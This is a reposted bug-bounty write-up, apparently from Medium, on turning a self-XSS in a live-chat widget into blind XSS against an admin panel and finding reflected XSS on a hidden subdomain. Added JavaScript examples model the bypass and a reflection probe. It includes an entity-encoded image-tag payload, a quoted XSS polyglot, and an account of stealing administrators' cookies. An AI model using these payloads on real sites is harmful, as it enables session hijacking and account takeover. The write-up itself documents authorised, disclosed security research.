Self XSS leads to blind XSS and Reflected XSS

medium.com · devanshbatham/Awesome-Bugbounty-Writeups · 20 hours ago · bug-bounty
quality 5/10 · average
0 net
AI Summary

A bug bounty hunter demonstrates chaining self-XSS to blind XSS in an admin panel via HTML entity encoding bypass, then discovers a reflected XSS on an undiscovered subdomain using KNOXSS payload analysis, earning $700 total. The writeup focuses on practical payload techniques and methodology rather than detailed technical analysis.

Entities
KNOXSS Sublist3r Skeletorkeys Friendly
Self XSS leads to blind XSS and reflected XSS. | by Friendly

In regards to this tweet: https://twitter.com/Skeletorkeys/status/1026497897871884289

Friendly · ~3 min read · August 6, 2018 (Updated: August 10, 2018) · Free: Yes

Important Note: This website does not want me to disclose their name until they have set up their bounty program. I will disclose it in the future if they allow me to, or they will likely do it themselves, from my interpretation of what they said. In this post I will explain, to the best of my knowledge, how KNOXSS plays a role here, how I got a blind XSS through a self XSS, and how I then got a reflected XSS. If you message me on Twitter for help, I will try my best to assist you, but regarding this website the answer is a straight NO. My reason is simple: I do not want to break their privacy, lose my contact with them, or lose any future bounties this website has to offer me. I don't expect this to work for everyone, since each website's WAF is different from the next, and so is the way it works.

Now to the fun part.

Getting an XSS on myself on this website was the trickiest and most difficult part. When I tried to input the following characters: ", ', <, >, / and \, I saw that they were being filtered in the live support chat and weren't being rendered at all. After spending 20-30 minutes, I tried some HTML entities and saw my output being rendered as regular tags, so I decided to cook up an image-tag XSS. I used an entity-encoded "> image-tag payload, and my output came back as a real "> followed by the tag, which gave me this:

OUR MAGICAL CONFIRMATION "1" :D

Then their live support team member messaged me saying: "Hey, did you send a popup box with a message saying "1"?", and I responded with "Yes I did."
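The bypass described above, modelled as an added example in JavaScript. This is not the author's payload or the site's code: the filter logic, the function names and the payload are assumptions built from the post's description. The chat filter strips the characters the post lists, the admin panel decodes HTML entities before handing the message to an HTML sink, and a hardened renderer encodes at output time instead, so the same message can only ever be text.

```javascript
// Added example, not code from the post or the site. It models the bypass the post
// describes: the live-chat filter stripped ", ', <, >, / and \ from messages, but the
// admin panel decoded HTML entities before rendering them as markup, so an
// entity-encoded <img onerror> payload passed the filter and fired in the support
// agents' browsers. Function names, the filter regex and the payload are assumptions.

// Assumed blacklist filter: strips the characters the post lists, nothing else.
function chatFilter(message) {
  return message.replace(/["'<>\/\\]/g, "");
}

// Minimal HTML entity decoder (named, decimal and hex forms).
const NAMED = { lt: "<", gt: ">", quot: '"', apos: "'", amp: "&", sol: "/", bsol: "\\" };
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (match, body) => {
    if (body[0] === "#") {
      const hex = body[1].toLowerCase() === "x";
      return String.fromCodePoint(parseInt(body.slice(hex ? 2 : 1), hex ? 16 : 10));
    }
    const named = NAMED[body.toLowerCase()];
    return named === undefined ? match : named;
  });
}

// Vulnerable admin-panel path: decode, then hand the string to an HTML sink (innerHTML).
function renderVulnerable(message) {
  return decodeEntities(chatFilter(message));
}

// Hardened path: whatever decoding happens, HTML-encode at output time so the message
// can only ever be text. (In a real DOM, assigning to textContent achieves the same.)
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, c => map[c]);
}
function renderHardened(message) {
  return escapeHtml(decodeEntities(chatFilter(message)));
}

// Constructed payload: every filtered character is written as an entity, so the
// blacklist has nothing to remove. Decoded, it is: "><img src=x onerror=alert(1)>
const PAYLOAD = "&quot;&gt;&lt;img src=x onerror=alert(1)&gt;";

// True if the rendered markup contains an element with an inline event handler.
function hasLiveHandler(html) {
  return /<[a-z]+[^>]*\son[a-z]+\s*=/i.test(html);
}

// Stand-alone demonstration.
console.log("filter left payload intact:", chatFilter(PAYLOAD) === PAYLOAD);
console.log("vulnerable render fires:   ", hasLiveHandler(renderVulnerable(PAYLOAD)));
console.log("hardened render fires:     ", hasLiveHandler(renderHardened(PAYLOAD)));
```

The point of the hardened path is that input filtering on the chat side is irrelevant to safety: the admin panel is a second consumer of the same data, and the only encoding that matters is the one applied at the moment the string meets an HTML sink.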
That moment I knew I had a blind XSS which reflected back into their admin panel. So I quickly cooked up another payload to grab their cookies, the big boys' cookies. That moment I knew I had access to their administrators' and devs' accounts. I swiftly contacted them and their administrators again, and they asked me if I could log in as them and give a proof of concept, which I did. I logged in and changed their names to my name for a bit more proof of concept. They were shocked. They asked me for my PayPal to send me a lil something, something. ;) I was awarded $500 for this with the reason "Security Guy." Ha.

However, I didn't stop there. The next part uses KNOXSS and Sublist3r. I used Sublist3r, which helped me locate all their subdomains. I found one of them, http://search.websitename.com, which wasn't listed on their website at all and wasn't secured at all: just a search box and a bunch of outdated information. First I tried "> and got no alert, which was a bummer. I tried every single payload I could think of and got no result. So I went to KNOXSS, posted my POST data and saw something interesting: %3E%3CScrip%3E was being rendered in the URL as > . So I did a quick Google search and found a payload similar to what I was using:

1%3C!%27/*%22/*\%27/*\%22/* --%3E%3C/Script%3E%3CImage%20Srcset=K%20*/;%20Onerror=confirm1%20//%3E#

I put that in my URL with my POST data and got my little confirmation 1. I quickly contacted their administrators and devs and explained how dangerous this can be. They agreed with me and quickly took down that subdomain. I was then rewarded $200 for the reflected XSS, with a little reason: "Try to reflect this back." They have a great sense of humor. Ha.
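The reflection check described above, the thing KNOXSS surfaced when the POST data came back with %3E%3CScrip%3E decoded into raw markup, as an added example. This is not the author's or KNOXSS's code: it sends a probe carrying each character an XSS payload needs and examines every reflection in the response for which characters come back unencoded. The two response bodies are constructed for the example. The polyglot is the one the post quotes, written here with a tagged-template call (confirm`1`); the post's rendition shows confirm1, so the exact original form is an assumption.

```javascript
// Added example, not the author's or KNOXSS's code. It reproduces the check the post
// describes on the search subdomain: send a probe that carries every character an XSS
// payload needs, then look at how each one comes back in the response. Both response
// bodies below are constructed for the example, not captured from the real site.

const MARK = "kx7q";                                   // unique marker to locate reflections
const SPECIALS = ["<", ">", '"', "'", "/", "\\", "(", ")", "`"];

// Build the probe and its URL-encoded form (what goes into the query string or POST body).
function buildProbe() {
  const raw = MARK + SPECIALS.join("") + MARK;
  return { raw, encoded: encodeURIComponent(raw) };
}

// For every reflection of the probe, report which specials survived unencoded.
// A character encoded as &lt; / &quot; / &#39; (or dropped) does not count as survived.
function classifyReflection(body) {
  const results = [];
  let start = body.indexOf(MARK);
  while (start !== -1) {
    const end = body.indexOf(MARK, start + MARK.length);
    if (end === -1) break;
    const between = body.slice(start + MARK.length, end);
    const survived = SPECIALS.filter(c => between.includes(c));
    results.push({ offset: start, survived, allRaw: survived.length === SPECIALS.length });
    start = body.indexOf(MARK, end + MARK.length);
  }
  return results;
}

// Raw < and > in an HTML-body reflection is the case the post hit: tags can be injected.
function exploitableAsHtml(result) {
  return result.survived.includes("<") && result.survived.includes(">");
}

// Polyglot the post quotes (Medium's rendering shows "confirm1"; the tagged-template
// form confirm`1` is assumed here). It is built to break out of a JS string, a comment
// or a script block, then land an <Image> tag whose OnError fires.
const POLYGLOT = "1<!'/*\"/*\\'/*\\\"/* --></Script><Image SrcSet=K */; OnError=confirm`1` //>#";

// Constructed responses: every sink encodes the term in SAFE_BODY; in VULN_BODY the
// <title> sink encodes it but the result paragraph echoes it raw.
const SAFE_BODY =
  "<title>Search: kx7q&lt;&gt;&quot;&#39;/\\()`kx7q</title><input value=\"kx7q&lt;&gt;&quot;&#39;/\\()`kx7q\">";
const VULN_BODY =
  "<title>Search: kx7q&lt;&gt;&quot;&#39;/\\()`kx7q</title><p>No results for kx7q<>\"'/\\()`kx7q</p>";

// Stand-alone demonstration.
const probe = buildProbe();
console.log("send:", probe.encoded);
for (const r of classifyReflection(VULN_BODY)) {
  console.log(`reflection at ${r.offset}: survived ${JSON.stringify(r.survived)}` +
              (exploitableAsHtml(r) ? "  -> raw tags allowed, try " + encodeURIComponent(POLYGLOT) : ""));
}
```

Looking at each reflection separately matters: the same search term usually lands in several sinks, and one encoded sink (the title) says nothing about the next one (the body), which is exactly the gap the polyglot exploited here.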
Total bounty for the day: $700 USD

If you have any questions or comments, feel free to message me on Twitter, or tweet me @Skeletorkeys. Thank you for reading, and I hope this is informative enough. I apologize for not sharing that domain with you all. Again, this isn't my choice, it's the website's choice, and I respect that and I hope you guys do as well. I probably used some terms wrong too. Heh. Anyways, thanks for reading.

#security #xs #blind-xss #xss-attack #reflected